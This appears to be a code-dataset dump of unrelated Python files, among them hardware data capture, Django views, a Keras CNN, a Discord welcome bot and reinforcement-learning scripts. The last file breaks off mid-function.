index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
13,100 | 77e2faf3ca58fdfcd776fbf11975f1b7c817a28c | '''
AD9434-FMC-500EBZ super simple data capture example
Tested on ZC706 board.
'''
import sys
try:
import iio
except:
print ("iio not found!")
sys.exit(0)
import time, struct
import numpy as np
import matplotlib.pyplot as plt
bufflen = 8192
# Setup Context
my_ip = 'ip:192.168.2.1' # Pluto's default
my_ip = 'ip:10.54.6.13' # Change to command-line argument
try:
ctx = iio.Context(my_ip)
except:
print("No device found")
sys.exit(0)
clock = ctx.find_device("ad9571-4")
rxadc = ctx.find_device("cf-ad9467-core-lpc") # RX/ADC Core in HDL for DMA
v0 = rxadc.find_channel("voltage0")
v0.enabled = True
rxbuf = iio.Buffer(rxadc, bufflen, False) # False = non-cyclic buffer
for j in range(5): #Flush buffers.
rxbuf.refill()
x = rxbuf.read()
# got our data, clean up...
del rxbuf
del ctx
#get data from buffer
data = np.frombuffer(x, np.int16)
adc_amplitude = 2**12
window = np.blackman(bufflen) / sum(np.blackman(bufflen)) # Windown funciton, normalized to unity gain
data_nodc = data - np.average(data)
windowed_data = window * data_nodc
freq_domain = np.fft.fft(windowed_data)/(bufflen) # FFT
freq_domain_magnitude = np.abs(freq_domain) # Extract magnitude
freq_domain_magnitude *= 2
freq_domain_magnitude_db = 20 * np.log10(freq_domain_magnitude/adc_amplitude)
plt.figure(1)
plt.clf()
plt.subplot(2,1,1)
fig = plt.gcf()
fig.subplots_adjust(right=0.68)
plt.plot(data)
plt.title('Ch0: Time Domain Samples')
plt.subplot(2,1,2)
fig = plt.gcf()
fig.subplots_adjust(right=0.68)
plt.plot(freq_domain_magnitude_db)
plt.title('Ch1: FFT')
plt.show() |
13,101 | cf91715e4809002b13b89f814a75519ddb5f9ef8 | import pandas
def get_headered_csv_dataframe(path):
with open(path, 'r') as f:
metadata = {}
for line in f:
line = line.strip()
if not line:
continue
elif line in ('Long term averages', 'BLEACH THRESHOLDS'):
break
elif line.startswith('STATION,'):
value = line.partition(',')[-1]
try:
# HACK: It seems the longitude is listed
# under STATION for the thresholds data!
float(value)
metadata['LONGITUDE'] = value
except ValueError:
metadata['STATION'] = value
elif line.startswith('LATITUDE,'):
metadata['LATITUDE'] = line.partition(',')[-1]
elif line.isupper():
key = line
elif line:
if key in metadata:
metadata[key] += '\n'+line
else:
metadata[key] = line
return metadata, pandas.read_csv(f)
if __name__ == '__main__':
print(get_headered_csv_dataframe('data_csv_days/1_days.csv'))
print()
print(get_headered_csv_dataframe('data_csv_avgtemp/1_avgtemp.csv'))
|
13,102 | 5fdfd6783f1c0c2285bcc2219cfadb76f1d8b8af | from apscheduler.schedulers.background import BackgroundScheduler
from . import cron
scheduler = BackgroundScheduler()
scheduler.start()
def start():
global scheduler
# scheduler.add_job(cron.startit, 'interval', seconds=3)
# scheduler.add_job(cron.startit, 'interval', hours=23)
scheduler.add_job(cron.updateit, 'interval', seconds=50)
|
13,103 | 2ead00d76b6543bfcd19b9c2b2664a7d06382216 | # Create your views here.
from django.http import HttpResponse
from django.http import HttpResponseRedirect
def index(request):
return HttpResponse("Hello, world. You're at the poll index.")
# recall or note that %s means, "subsitute in a string"
def detail(request, poll_id):
return HttpResponse("You're looking at poll <strong> %s. </strong>" % ( poll_id,))
def results(request, poll_id):
return HttpResponse("You're looking at the results of poll <strong> %s. </strong>" % (poll_id,))
def vote(request, poll_id):
return HttpResponse("You're voting on poll <u> %s. </u>" % (poll_id,))
def redirect_to_polls(request):
return HttpResponseRedirect('/polls/') |
13,104 | 8406c2656e297a5c1ce84259db25e2ee9517b73d |
##
# Bucket sorting of the array. Implicit assumption that all
# elements are less than 100
##
def bucketSort(array):
buckets = [[],[],[],[],[],[],[],[],[],[]]
for element in array:
bucketNumber = int(element / 10)
buckets[bucketNumber].append(element)
returnArray = []
for bucket in buckets:
bucket.sort()
returnArray.extend(bucket)
return returnArray
print(bucketSort([2,1,62,34,26,53,26,57,3]))
|
13,105 | cfce672ae58e0f5beb73a86d785727806d57aebd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import setuptools
version_file = open(os.path.join(".", "VERSION"))
version = version_file.read().strip()
download_url = \
'https://github.com/dudektria/pnictogen/archive/{:s}.tar.gz'.format(version)
doclines = """pnictogen: input generation for computational chemistry packages
pnictogen is a Python library that generates input files for computational
chemistry packages.
""".split("\n")
# Chosen from http://www.python.org/pypi?:action=list_classifiers
classifiers = """Development Status :: 3 - Alpha
Environment :: Console
Intended Audience :: Science/Research
Intended Audience :: Education
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Natural Language :: English
Operating System :: OS Independent
Programming Language :: Python
Programming Language :: Python :: 3
Topic :: Scientific/Engineering :: Chemistry
Topic :: Education
Topic :: Software Development :: Libraries :: Python Modules"""
keywords = [
'science',
'research',
'chemistry',
]
install_requires = [
'nose',
'parse',
'pyyaml',
'jinja2',
'openbabel',
]
setuptools.setup(
name='pnictogen',
version=version,
url='https://github.com/dudektria/pnictogen',
download_url=download_url,
author='Felipe Silveira de Souza Schneider',
author_email='schneider.felipe@posgrad.ufsc.br',
license='MIT',
description=doclines[0],
long_description="\n".join(doclines[2:]),
classifiers=classifiers.split("\n"),
packages=setuptools.find_packages(exclude=['*test*']),
keywords=keywords,
install_requires=install_requires,
include_package_data=True,
test_suite='nose.collector',
entry_points={
'console_scripts': [
'pnictogen = pnictogen:main',
],
},
)
|
13,106 | 8d1a99a738b13c2effeb8072edc55426ec4c4977 | from django.shortcuts import render, redirect
from MyApp import connections as conn
from MyApp import constants
from MyApp.models import *
import json
import pymongo
# Create your views here.
# index page
def Homepage(request):
return render(request,'index.html')
def getTwitter(request):
Twitter_data()
return redirect('/')
def Twitter_data(request):
conn.twitterCol.drop()
i = 1
for status in conn.twitterAPI.user_timeline(user_id='32968470'):
print(status)
tweetData = {
"status_num": i,
"status_text": status.text,
"status_name": status.user.name,
"status_created_at": status.created_at,
"status_favourate_Count": status.favorite_count,
"status_lang": status.lang
}
conn.twitterCol.insert_one(tweetData)
conn.db.heights.create_index([('name', pymongo.ASCENDING)], unique=True)
print(tweetData['status_text'])
i+=1
cc = twitter.objects.create(status_num=tweetData['status_num'],status_name=tweetData['status_name'], status_text=tweetData['status_text'],
status_created_at=tweetData['status_created_at'],status_favourate_Count=tweetData['status_favourate_Count'], status_lang=tweetData['status_lang'])
cc.save()
tweets = twitter.objects.all()
context = {
"tweet":tweets
}
return render(request,'twitter.html', context)
def getTumblerdata(request):
conn.tumblerrCol.drop()
data = conn.tumblrClient.posts(constants.tumblr.BLOG_NAME)
postdata = []
p = data['posts']
print(p)
i =1
for element in p:
traildata = element['trail']
blogContent = ""
for blog in traildata:
blogContent = blog['content']
data = {
"post_number": i,
"post_type": element['type'],
"post_url": element['post_url'],
"post_created_at": element['date'],
"post_tittle": element['summary'],
"post_content": blogContent
}
postdata.append(data)
print(data)
i+=1
final_data = {"post_data":postdata}
conn.tumblerrCol.insert_one(final_data)
ff = trumbler.objects.create(status_num=data['post_number'],status_name=data['post_type'], status_text=data['post_tittle'],
status_created_at=data['post_created_at'],status_favourate_Count=data['post_content'], status_lang=data['post_url'])
ff.save()
tt = trumbler.objects.all()
context = {
"tt":tt
}
return render(request, 'tumbler.html', context) |
13,107 | 0a2b4833f6a7df1bc713e11ebdb9a924b3b8e09f | import mcutk
from mcutk.apps import appfactory
App = appfactory('iar')
app =App.get_latest()
print app.version
print app.path
print app.is_ready |
13,108 | 24eb052c55ff38b76554ef46d5907664d4b8ffc3 | class Student:
school="DNS"
def __init__(self,m1,m2,m3):
self.m1=m1
self.m2=m2
self.m3=m3
def avg(self):
return (self.m1+self.m2+self.m3)/3
@classmethod #class method
def schooldet(cls):
cls.school="Subharti"
return cls.school
@staticmethod
def info():
print("this is the static method")
s1=Student(67,89,42)
s2=Student(76,98,69)
print(s2.avg(),Student.school)
print(s1.avg(),Student.schooldet())
s1.info()
|
13,109 | 3847ec095302e8a39f3b1f2df7cd487c169e84b4 | class Solution:
def fullJustify(self, words: List[str], maxWidth: int) -> List[str]:
if(words):
len_words = len(words)
if(len_words==1):
s = words[0]
s = s + " "*(maxWidth - len(s))
l=[]
l.append(s)
return l
else:
c = 0
i=0
ans = []
while(i<len_words):
len_temp = 0
l=[]
while(True and i<len_words):
my = words[i]
len_temp = len_temp + len(my) + 1
# print(my,len_temp)
if(len_temp>maxWidth+1):
break
l.append(my)
i = i + 1
ans.append(l)
l = []
for i in range(0,len(ans)-1):
len_ = 0
temp = ans[i].copy()
len_ans = len(temp)
for rec in temp:
len_ = len_ + len(rec)
if(len_ans==1):
ans[i].append(" "*(maxWidth-len(rec)))
else:
spaces = maxWidth - len_
equall = spaces//(len_ans - 1)
remaining = spaces % (len_ans-1)
for j in range(1,(len_ans*2) - 1,2):
if(remaining==0):
ans[i].insert(j," "*equall)
else:
ans[i].insert(j," "*(equall+1))
remaining = remaining -1
s=''
for rec in (ans[-1]):
s = s + rec + " "
len_s = len(s)
if(len_s>maxWidth):
s = s[0:maxWidth]
else:
s = s + " "*(maxWidth - len_s)
for i in range (len(ans)-1):
temp = ''
for rec in ans[i]:
temp = temp + rec
l.append(temp)
l.append(s)
return l
|
13,110 | e57b7854247602ccb4399bb4fa8f03a1d71ea4c3 |
class Eva2Simulation:
def __init__(self, standort, standort_id, fruchtfolge, anlage, fruchtfolge_glied=None):
self.__standort = standort
self.__standort_id = standort_id
self.__fruchtfolge = fruchtfolge
self.__anlage = anlage
self.__fruchtfolge_glied = fruchtfolge_glied
self.__result_map = {}
def setStandort(self, standort):
self.__standort = standort
def setStandortID(self, standort_id):
self.__standort_id = standort_id
def setFruchtfolge(self, fruchtfolge):
self.__fruchtfolge = fruchtfolge
def setAnlage(self, anlage):
self.__anlage = anlage
def setFruchtfolgeglied(self, fruchtfolge_glied):
self.__fruchtfolge_glied = fruchtfolge_glied
def setResultMap(self, result_map):
self.__result_map = result_map
def display(self):
print "EVA2 Simulation: ", self.__standort_id, " ",self.__standort, ", FF",self.__fruchtfolge, ", Anlage", self.__anlage
def getStandort(self):
return self.__standort
def getStandortID(self):
return self.__standort_id
def getFruchtfolge(self):
return self.__fruchtfolge
def getAnlage(self):
return self.__anlage
def getFruchtfolgeglied(self):
return self.__fruchtfolge_glied
def getResultMap(self):
return self.__result_map
"""
"""
class OptimizationConfig:
def __init__(self, crop_id, crop_name):
self.__crop_id = crop_id
self.__crop_name = crop_name
self.__simulation_list = []
output = {}
output["Ertrag"] = True
output["Zwischenernte"] = True
output["Bedgrad"] = True
output["Hoehe"] = True
output["Ertrag_N"] = True
output["Zwischenernte_N"] = True
output["Nmin30"] = True
output["Nmin60"] = True
output["Nmin90"] = True
output["Wasser30"] = True
output["Wasser60"] = True
output["Wasser90"] = True
error = {}
error["rmse"] = True
error["mae"] = True
error["nmae"] = True
error["nrmse"] = True
def setCropID(self, crop_id):
self.__crop_id = crop_id
def setCropName(self, crop_name):
self.__crop_name = crop_name
def setSimulationList(self, list):
self.__simulation_list = list
def getCropID(self):
return self.__crop_id
def getCropName(self):
return self.__crop_name
def getSimulationList(self):
return self.__simulation_list
class FF:
def __init__(self, ff, ff_glied):
self.ff = ff
self.ff_glied = ff_glied |
13,111 | 6a70ada651bcafcd75b8032640331f6d194eaacb | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
SQLALCHEMY_DATABASE_URL = "sqlite:///./sql_app.db"
# SQLALCHEMY_DATABASE_URL = "postgresql://user:password@postgresserver/db"
# connect_args={"check_same_thread": False} аргумент, требуемый только для SQLite
engine = create_engine(SQLALCHEMY_DATABASE_URL, connect_args={"check_same_thread": False})
# Сеанс для БД. Каждый экземпляр класса - новый сеанс
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
# Базовый класс для создания моделей
Base = declarative_base()
|
13,112 | c343c8d68b373dfdd6969cea328d715381def28e | from keras import layers
from keras import models
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
import pickle
import conf
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu',
input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-4),
metrics=['acc'])
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1./255)
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
# This is the target directory
conf.train_dir,
# All images will be resized to 150x150
target_size=(150, 150),
batch_size=20,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
conf.validation_dir,
target_size=(150, 150),
batch_size=20,
class_mode='binary')
hist = model.fit_generator(
train_generator,
steps_per_epoch=conf.steps_per_epoch,
epochs=conf.epochs,
validation_data=validation_generator,
validation_steps=50)
model.save('model.h5')
pickle.dump(hist.history, open('history.p', 'wb'))
|
13,113 | 6e070ec7c512957ae19f2a7bf6933dd58fef378c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 29 00:11:38 2019
@author: eric
"""
#Partie 1 -
"""la premier etape ici est d'importer les librairie qui nous aiderons dans
l'importation et le traitements sur nos differentes images."""
""" initialisation ANNs"""
from keras.models import Sequential
"""operation de convolution"""
from keras.layers import Convolution2D
"""Pooling reduction image"""
from keras.layers import MaxPooling2D
"""flattenign pour applatir pour entrer ANN"""
from keras.layers import Flatten
""" pour ajouter des couche cachée et connecter"""
from keras.layers import Dense
from keras.layers import Dropout
# initialisation du CNN de neurone a convolution comme les ANNs
classifier = Sequential()
# step 1: convolution ajout de la couche de convolution
"""
- dans cette partie pour la creation de notre couche de convolution nous
devons definir dans cette etape le nombre de feature detector que nous allons
utiliser elle correspond en meme temps au nombre de features maps que nous allonsq
creer car pour chaque features detector correspond un features maps donné
- filters= dimensioanlité espace de sortie === nombre de feature detector c'est dire de filtre
comme remarque ici si nous avons une deuxieme couche de convolution, alors le nombre de filtre dois
doubler normalement c'est a dire 64 dans autre ccas ainsi de suite. cella tu peux expliquer
-kernel_size= elle correspond a la taille de la matricfe de notre filters
sa pouvais etre de la forme [3, 3] ou [3,5...]
-strides= taille de deplacement de pixel 1 ou 2 quand on effectue l'operation de convolution
-inpur_shape= permet de definir la taille de nos image a lire(forcer les image a adopter le meme format) et le second
argument 3 permet de dire que nous manipulons des images couleurs RGB
-activation= pour ajouter de la non lineariter dans le modele
permet de remplacer toutes les valeurs négative par des 0.
-relu correspond a la fonction redresseur comme fonction d'activation
"""
classifier.add(Convolution2D(filters=32, kernel_size=3, strides=1,
input_shape=(200, 200, 3),
activation = "relu"))
# step 2: Pooling
"""
elle consiste a prendre la feauture maps que nous avons obtenue juste avant
l'etape de convolution et on va prendre les case 2/2 on construit comme sa jusqu'aobtenir
un plus petit resultat
- pool_size=permet de definir la taille de notre matrice de selection du maximun
"""
classifier.add(MaxPooling2D(pool_size=(2,2)))
# ajout de la nouvelle couche de convolution faut pas oublier son pooling
classifier.add(Convolution2D(filters=64, kernel_size=3, strides=1,
activation = "relu"))
classifier.add(MaxPooling2D(pool_size=(2,2)))
# a present pour melanger les deux couche de convolution on dois multiplier par 64 filtre a present 32*2
classifier.add(Convolution2D(filters=128, kernel_size=3, strides=1,
activation = "relu"))
classifier.add(MaxPooling2D(pool_size=(2,2)))
# step 3: Flattening
"""
-phase d'applatissage pour obtenir des input pour notre ANNs
elle se fait a la fin pour permettre de renseigner de bonne information au neurone
"""
classifier.add(Flatten())
# step 4: ANNs completement connecté
"""
- Dense = permet d'ajouter une couche de neurone caché
-units= nombre de neurone qui appartiennent a la couche
dans le cas des reseaux de neurone artificielle
on a dis que nous pouvions prendre le nombre de variable ici nous ne poiuvons
pas definir normalement
alors dans notre cas on aura bcp de features faut prendre les nombre
puissance de 2 sa marche tres bien
-activation= represente la fonction d'activation pour cette couche
- relu est tres utiliser pour sa particularité d'etre stricte
soit elle laisse passer le signal ou non
"""
classifier.add(Dense(units=256, activation="relu"))
classifier.add(Dropout(rate=0.3))
classifier.add(Dense(units=256, activation="relu"))
classifier.add(Dropout(rate=0.3))
classifier.add(Dense(units=256, activation="relu"))
classifier.add(Dropout(rate=0.3))
# definiton de la couche de sortie de notre reseau de neurone a convolution
"""
- pour la couche de sortir puisque
nous somme tjr dans le contexte de classification
alors nous utilisons la fonction sigmoid sinon on aurais utiliser dans un cadre c
catégorielle la fonction softmax et nous avons juste besoin de 1 neurpne
"""
classifier.add(Dense(units=6, activation="softmax"))
# etape de compilation de notre reeseau de neurone.
"""
- optimizer= correspond a l'algorithme de macine learning a utiliser pour la classification
adam correspond au stochastique de merde
-loss= represente la fonction de cout binary_cross.. pour la classification et categorical_cros... pour la regression
-metrics= "accuracy"
"""
classifier.compile(optimizer="adam", loss="categorical_crossentropy",
metrics=['accuracy'])
#########################################################
# Entrainement de notre réseaux de neurone a convolution#
#########################################################
"""
- faut aller lire dans la documentation de keras a keras documentation
- augmentation d'image : permet d'eviter le surentrainement sur le jeux de donné il permet de
modifier le jeux de donnée de toutes les formes et de transformer les images et nous permettra d'avoir beaucoup plus
d'image differente
"""
from keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1./255)
training_set = train_datagen.flow_from_directory(
'data/photos/train_pic',
target_size=(200, 200),
batch_size=32,
class_mode='categorical')
test_set = test_datagen.flow_from_directory(
'data/photos/test_pic',
target_size=(200, 200),
batch_size=32,
class_mode='categorical')
"""
pour obtenir le nombre de validation_steps, on divise le nombre de donnée
du dataset par le nombre de batch_size::::: 2000/32....
- pour le training_set = on divise par le nombre d'observation de notre
training set par le nombre de batch_size se qui donne 8000/32=250
- pour le validation_test= ici on effectue le meme processus pour le training
set mais on prend par contre l'echantillon de test a cette fois 2000/32 = 62.5 ===63
-nous avons mentionner lors de la construction des ANNs cella permet d'evaluer le reseau au fur et a mesure qu'on l'entraine
pour ne pas l'evaluer a la fin de l'apprentissage en meme temps
ici on fais tous a la fois comme le k-cross... evaluation et ajustement de paramètre
"""
classifier.fit_generator(
training_set,
steps_per_epoch=82,
epochs=10,
validation_data=test_set,
validation_steps=10)
#evaluation du modele
classifier.evaluate_generator(generator, steps=None, callbacks=None, max_queue_size=10, workers=1, use_multiprocessing=False, verbose=0)
#pour enregistrer le model apres entrainement
classifier.save('train_avec_cnn_accuracy_faible.h5')
"""pour ouvrir le fichier apres entrainement on utilise le classifier.load()"""
# dANS CETTE NOUVELLE PHASE NOUS ALLONS PASSER A LA PRÉDICTION D'ANIMAUX CHIEN OU CHAT
"""
- ici il ne s'agit pas de manipuler des matrice mais plutot des image alors nous
devons les importers dans l'endroit ou il se trouve grace a des bibliotheque de keras
- ensuite penser a dimenssionner notre images a la taille voulu
- et lancer la prediction comme avec les ANNs
"""
import numpy as np
from keras.preprocessing import image
# importation de notre image en spécifiant la taille qui correspond forcement a celle de l'entrainement
test_image = image.load_img('data/photos/inouss.png',
target_size=(200, 200))
# ajout d'une quatrieme dimenssion a notre image a l'indice 0 pour permettre l'evaluation par notre CNN
# axis permet de spécifier l'index du groupe
# car nous avons dans notre cas le premier groupe si nous avons plusieurs groupe on peut les positionner de la meme facon
test_image = np.expand_dims(test_image, axis=0)
# transformation de notre image en array un tableaux d'element
# test_image = image.img_to_array(test_image)
# prediction sur notre image chargé
result = classifier.predict(test_image)
# maintenant il nous faut spécifier a quoi correspond chaque prédiction 0,1,...,6
training_set.class_indices
# on peut maintenant mettre le resultat dans une variable et afficher
if result[0][0]==1:
prediction = "Je viens de trouver FATAO ABDOUL"
elif result[0][1]==1:
prediction = "Je viens de trouver Eric Papain MEZATIO"
elif result[0][2]==1:
prediction = "Je viens de trouver Inoussa Ouedraogo"
elif result[0][3]==1:
prediction = "Je viens de trouver JEAN SAMMUEL"
elif result[0][4]==1:
prediction = "Je viens de trouver Kenley FAVARD"
else:
prediction = "Je viens de trouver NELKA Delux"
"""
POUR AMELIORER UN MODÈLE ON PEUT :
- Changer la taille de l'image
- ajouter plusieurs couche de convolution
- ajouter de nouvelle couche de reseaux de neurone et pour eviter
de tomber dans les cas de surapprentissage alors ajouter le drop-out
pour definir le taux d'apprentissage qui permet de ne pas construire un réseaux de neurone
qui apprend trop il permet de désactiver les neurones qui apprenent trop.
- tous ses éléments permettent d'améliorer les performance de notre modèle
et eviter le surapprentissage lorsque le taux d'apprentissage sur de nouvelle
donnée est tres inférieur a celle de donnée d'entrainement.
""" |
13,114 | 578e2b394a42bd81fee3c46a47a9c9885a24859b | CSS_TO_EMOTE = {
"pennant teamtl" : ":teamliquid:",
"pennant teamsecret" : ":teamsecret:",
"pennant teamig" : ":invictus:",
"pennant teamvici" : ":vici:",
"pennant teamfnatic" : ":fnatic:",
"pennant teamtnc" : ":tnc:",
"pennant teamvp" : ":virtuspro:",
"pennant teamnavi" : ":navi:",
"pennant teamdc" : ":chaos:",
"pennant teampain" : ":paingaming:",
"pennant teamaster" : ":aster:",
"pennant teamnigma" : ":nigma:",
"pennant teambeastcoast" : ":beastcoast:",
"pennant teameg" : ":evilgeniuses:",
"pennant teama" : ":alliance:"
} |
13,115 | 5cd3749373911de8a129c057768de32c34794f4d | from __future__ import division
import numpy as np
def relperm(s, Fluid): # Return Mw, Mo, dMw, dMo
# S = (s-Fluid['swc'])/(1.0-Fluid['swc']-Fluid['sor'])
# Mw = np.square(S)/Fluid['vw']
# Mo = np.square(1.0-S)/Fluid['vo']
# dMw = 2.0*S/Fluid['vw']/(1.0-Fluid['swc']-Fluid['sor'])
# dMo = -2.0*(1.0-S)/Fluid['vo']/(1.0-Fluid['swc']-Fluid['sor'])
S = (s-Fluid['swc'])/(1.0-Fluid['swc']-Fluid['sor'])
Mw = S/Fluid['vw']
Mo = 1.0-S/Fluid['vo']
dMw = 1.0/(Fluid['vw']*(1.0-Fluid['swc']-Fluid['sor']))
dMo = -1.0/(Fluid['vo']*(1.0-Fluid['swc']-Fluid['sor']))
return Mw, Mo, dMw, dMo
|
13,116 | 4d8332cb9ad77df7f4cff5f5563f870eed4a1331 | background_actions.py
import discord
import asyncio
from discord.ext.commands import Bot
from discord.ext import commands
client = Bot(description="BOT DESCRIPTION HERE", command_prefix="BOT PREFIX HERE", pm_help = False) #add_your_bot_description_with_prefix_here
@client.event
async def on_ready():
print('Logged in as '+client.user.name+'')
print('--------')
print('--------')
print('Started <BOTNAME HERE>') #add_your_bot_name_here
return await client.change_presence(game=discord.Game(name='<BOT STATUS HERE>')) #add_your_bot_status_here
def is_owner(ctx):
return ctx.message.author.id == "Your id here" #replace_it_with_your_discord_id
@client.command(pass_context = True) #command_to_stop_your_bot_using-<prefix>shutdown
@commands.check(is_owner)
async def shutdown():
await client.logout()
@client.event #adds_symbol_or_text_before_member's_nick_when_he_joins_a_particular_server
async def on_member_join(member):
if member.server.id == "ServerID here":
print("In our server" + member.name + " just joined")
nickname = 'symbol/text here' + member.name #add_the_symbol_or_text_that_u_wanna__your_bot_add_before_a_member's_name_when_he/she_joins_your_server
await client.change_nickname(member, nickname)
@client.event #welcomes_user_in_dm_on_member_join
async def on_member_join(member):
print("In our server" + member.name + " just joined")
r, g, b = tuple(int(x * 255) for x in colorsys.hsv_to_rgb(random.random(), 1, 1))
embed = discord.Embed(color = discord.Color((r << 16) + (g << 8) + b))
embed.set_author(name='Welcome message')
embed.add_field(name = '__Welcome to Our Server__',value ='**Hope you will be active here. Check Our server rules and never try to break any rules. Also join our official server- https://discord.gg/vMvv5rr**',inline = False) #change_this_message_with_your_msg_that_you_wanna_ur_bot_send_in_dm_when_a_user_joins
embed.set_image(url = 'https://media.giphy.com/media/OkJat1YNdoD3W/giphy.gif')
await client.send_message(member,embed=embed)
print("Sent message to " + member.name)
client.run('BOT TOKEN HERE') #add_your_bot_token_here
|
13,117 | c92050d4fcc76866e53192c74915c143e1b533d2 |
from .msgflo import *
|
13,118 | b38b1cdfc5017ab0898085bc85a70e02cbaeb8ad | import logging
import numpy as np
import pdb
import torch
import torch.nn as nn
from logger import *
from deep_q_agent import DeepQAgent
from self_play_episodes import self_play_episodes
from mdp import Connect4MDP
logger = logging.getLogger(__name__)
class Trainer:
"""
Class for training deep q agents and tuning hyperparameters.
Guides agent through self play to build data for training and then learns
from random samples drawn from agent's replay_buffer.
"""
def __init__(self, agent=DeepQAgent(), target_update_freq=100, lr=.005, lr_gamma=.9, lr_step_size=5, gamma=.95, batch_size=64, eps_max=1, eps_min=.1, eps_freq=1000, eps_decrement=.01, *args, **kwargs):
self.mdp = Connect4MDP()
self.agent = agent
self.target_update_freq = target_update_freq
self.optimizer = torch.optim.Adam(params=agent.policy_net.parameters(), lr=lr)
self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=lr_step_size, gamma=lr_gamma, last_epoch=-1)
self.loss_fn = nn.MSELoss()
self.lr = lr
self.gamma = gamma
self.batch_size = batch_size
self.eps_max = eps_max
self.eps_min = eps_min
self.eps_freq = eps_freq
self.eps_decrement = eps_decrement
self.eps = lambda learning_iter: max(self.eps_min,
self.eps_max - (learning_iter/self.eps_freq) * self.eps_decrement)
def self_play(self, n_episodes):
"""
Generate training data by playing games vs self.
Gathers experiece tuples over n_episodes and pushes them to agent replay buffer.
"""
eps = self.eps(self.agent.learning_iters)
experiences = self_play_episodes(self.mdp, self.agent, n_episodes, eps)
for state, action, reward, next_state, done in experiences:
self.agent.replay_buffer.push(state, action, reward, next_state, done)
def learn(self):
"""
Update model with random batch from agent replay buffer.
"""
batch = self.agent.replay_buffer.sample(self.batch_size)
states = torch.tensor([x.state for x in batch], dtype=torch.float32).to(self.agent.device) # shape == (batch_size, 3, 6, 7)
actions = [x.action for x in batch]
rewards = torch.tensor([x.reward for x in batch], dtype=torch.float32).to(self.agent.device)
next_states = torch.tensor([x.next_state for x in batch], dtype=torch.float32).to(self.agent.device)
dones = [x.done for x in batch]
self.optimizer.zero_grad()
q_vals = self.agent.policy_net(states)[range(len(actions)), actions] # Q vals for actions taken
q_next_vals = self.agent.target_net(next_states).detach() # we don't care about grad wrt target net
q_next_vals[dones] = 0.0 # terminal states have no future expected value
q_targets = rewards + self.gamma * torch.max(q_next_vals, dim=1)[0]
# all_q_vals = self.agent.policy_net(states)
# print()
# print('actions')
# print(actions)
# print()
# print('original all q vals')
# print(self.agent.policy_net(states))
# print(self.agent.policy_net(states).shape)
# print()
# print('QVALS:', q_vals)
# print(q_vals.shape)
# print('\n\n')
# print('QTARGETS:', q_targets)
# print(q_targets.shape)
# breakpoint()
loss = self.loss_fn(q_targets, q_vals).to(self.agent.device)
loss.backward()
# for layer in self.agent.policy_net.named_parameters():
# # print(f'layer: {layer[0]}')
# # print(f'grad:', layer[1].grad)
# # print('loss', loss)
# # print('q_vals grad:', q_vals.grad)
# # print('states:', )
self.optimizer.step()
self.agent.learning_iters += 1
if self.agent.learning_iters % self.target_update_freq == 0:
self.agent.update_target_net()
# logger.info('Updated target net')
def train(self, iters, n_episodes):
"""
Train agent over given number of iterations. Each iteration consists
of self play over n_episodes and then a learn step where agent
updates network based on random sample from replay buffer
"""
for i in range(iters):
self.self_play(n_episodes)
self.learn()
def __repr__(self):
return f'Trainer for {self.agent.name}'
|
13,119 | 9d69e8273d796d72ca62f868462427b5dbf4a826 | import numpy as np
import matplotlib.pyplot as plt
import gym
import gym_bandits
import matplotlib.patches as mpatches
def main():
# Number of bandits
num_of_bandits = 10
# For each episode we will run these many iterations
iterations = 1000
episodes = 1000
# Create environment - Gaussian Distribution
env = gym.make('BanditTenArmedGaussian-v0')
# Run all episodes
epsilon_rewards = run_epsilon(env, num_of_bandits, iterations, episodes)
plt.figure(figsize=(12, 8))
plt.plot(epsilon_rewards, color='red')
plt.legend(bbox_to_anchor=(1.2, 0.5))
plt.xlabel("Iterations")
plt.ylabel("Average Reward")
greedy_patch = mpatches.Patch(color='red', label='epsilon-greedy')
plt.legend(handles=[greedy_patch])
plt.title("Average Rewards after "
+ str(episodes) + " Episodes")
plt.show()
def run_epsilon(env, num_of_bandits, iterations, episodes):
"""
This method will run all the episodes with epsilon greedy strategy
:param env: Bandit Gym Environment
:param num_of_bandits: Number of bandit arms
:param iterations: Iterations per episode
:param episodes: Number of episodes
:return: Array of length equal to number of episodes having mean reward per episode
"""
# Initialize total mean rewards array per episode by zero
epsilon_rewards = np.zeros(iterations)
for i in range(episodes):
print(f"Running Epsilon episode:{i}")
n = 1
action_count_per_bandit = np.ones(num_of_bandits)
mean_reward = 0
total_rewards = np.zeros(iterations)
mean_reward_per_bandit = np.zeros(num_of_bandits)
env.reset()
epsilon = 0.5
for j in range(iterations):
a = get_epsilon_action(epsilon, env, mean_reward_per_bandit)
observation, reward, done, info = env.step(a)
# Update counts
n += 1
action_count_per_bandit[a] += 1
# Update mean rewards
mean_reward = mean_reward + (
reward - mean_reward) / n
# Update mean rewards per bandit
mean_reward_per_bandit[a] = mean_reward_per_bandit[a] + (
reward - mean_reward_per_bandit[a]) / action_count_per_bandit[a]
# Capture mean rewards per iteration
total_rewards[j] = mean_reward
# Update mean episode rewards once all the iterations of the episode are done
